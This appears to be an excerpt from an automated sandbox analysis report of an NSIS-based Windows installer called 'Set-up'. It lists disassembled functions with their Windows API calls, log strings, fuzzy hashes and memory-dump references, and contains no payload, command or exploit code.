Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
%AimedCitizens%, xrefs: 00402770

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: %AimedCitizens%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-3483409562
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
